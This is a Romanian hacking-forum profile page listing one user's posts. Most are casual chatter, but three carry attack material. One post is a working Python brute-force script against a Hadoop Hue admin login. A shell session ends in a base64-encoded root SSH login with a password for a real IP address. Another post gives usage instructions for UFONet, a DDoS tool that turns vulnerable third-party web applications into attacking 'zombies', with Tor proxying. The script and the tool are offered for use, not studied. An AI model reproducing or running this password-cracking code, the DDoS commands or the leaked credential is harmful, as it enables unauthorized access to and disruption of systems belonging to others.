Jump to content

loading...

Active Members
  • Posts

    182
  • Joined

  • Last visited

Everything posted by loading...

  1. prost sunt, mai bine postam la market si dadeam o teapa de 100 daca stiam ca iese asa, in fine, imi revin eu, succes
  2. raspunzi tot cu intrebare? edit// am muncti 5 ani pt voi am postat
  3. ma confundati prieteni, eu nu-s ca restu de la mine din zona, daca va pretindeti la 100£ n-ati facut nimic
  4. halal comunitate, bag pula in el dublu post, sanatate
  5. nu e vorbab de respect, e vorba de probleme si a fost o cere, scoteti-mi ban-ul si va dau articole, m-a distrus
  6. cu faza de la vip, daca era imi vindeam pc-ul dar vroiam sa raman cu voi, in fine
  7. Salut, imi poate scrie cineva send.php pentru: <div id="tooplate_main"> <h4>Contact Form</h4> <form method="post" name="contact" action="#"> <label for="author">Name:</label> <input type="text" id="author" name="author" class="required input_field" /> <div class="cleaner h10"></div> <label for="email">Email:</label> <input type="text" class="validate-email required input_field" name="email" id="email" /> <div class="cleaner h10"></div> <label for="subject">Subject:</label> <input type="text" class="validate-subject required input_field" name="subject" id="subject"/> <div class="cleaner h10"></div> <label for="text">Message:</label> <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea> <div class="cleaner h10"></div> <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" /> <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" /> </form> </div> </div> cu redirect catre 'mesajtrimis.html' Multumesc
  8. eu n-am primit nici un mail
  9. done, de la mine era problema, aveam 2 tab-uri deschise +rep Kronzy
  10. Coupon Per User Limit Exceeded
  11. Salut, stie cineva cate ore/zile ti se incredinteaza masina la test drive BMW.. etc ? care sunt conditiile?
  12. in titlu scrie Orange, nu Lebara
  13. nici din Anglia nu se putea suna aseara
  14. World Numbers - Global Telephone Numbers Redirected Anywhere
  15. vezi aici,,, https://rstforums.com/forum/54068-sms-gateway.rst?highlight=sms+gateway https://rstforums.com/forum/80871-tutorial-cum-sa-ai-propriul-server-de-sms.rst?highlight=sms+gateway
  16. Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/pythonimport sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
  17. link-urile cu galben sunt reclame platite, Google AdWords
  18. server1.local:~# uname -a Linux server1.local 2.6.32-431.1.2.0.1.el6.x86_64 #1 SMP Fri Dec 13 13:06:13 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux server1.local:~# ls server1.local:~# uptime 04:14:51 up 15 days, 1:20, 1 user, load average: 0.00, 0.00, 0.00 server1.local:~# ls server1.local:~# cd server1.local:~# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz stepping : 6 cpu MHz : 2133.305 cache size : 6144 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm bogomips : 4270.03 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 23 model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz stepping : 6 cpu MHz : 2133.305 cache size : 6144 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm bogomips : 4266.61 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical, 48 bits virtual power management: server1.local:~# c3NoIHJvb3RANzguNDcuNDUuMzQNCjFsMFZleTB1MTIz b64
  19. Project info: - Package: UFOnet_v0.2b(.zip) - Code: Github / Sf Summary: UFONet - is a shell client designed to launch DDoS attacks against a target, using CSRF/XSS vectors on third party web applications, like botnet. It allows to use a proxy to manage 'zombies'. Installing: UFONet runs on many platforms. It requires Python and the following library: python-pycurl - Python bindings to libcurl On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl Testing botnet: Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. Urls of the 'zombies' should be like this: http://target.com/check?uri= After that, launch it: ./ufonet -t zombies.txt At the end of the process, you will be asked if you want to update the list automatically adding only 'vulnerable' web apps. Wanna update your list (Y/n) ------------- Examples: + with verbose: ./ufonet -t zombies.txt -v + with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118" Attacking a target: Enter the target to attack, with the number of rounds that will be attacked: ./ufonet -a http://target.comTarget -r 10 This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt", a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies', the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target. By default, if you don't put any round, it will apply only 1. Additionally, you can choose a place to recharge on target's site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn't use cache systems, this will do the attack more effective. ./ufonet -a http://target.com -b "/images/big_size_image.jpg" ------------- Examples: + with verbose: ./ufonet -a http://target.com -r 10 -v + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118" + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg" Source & Video: UFONet - DDoS attacks via Web Abuse (XSS/CSRF)
×
×
  • Create New...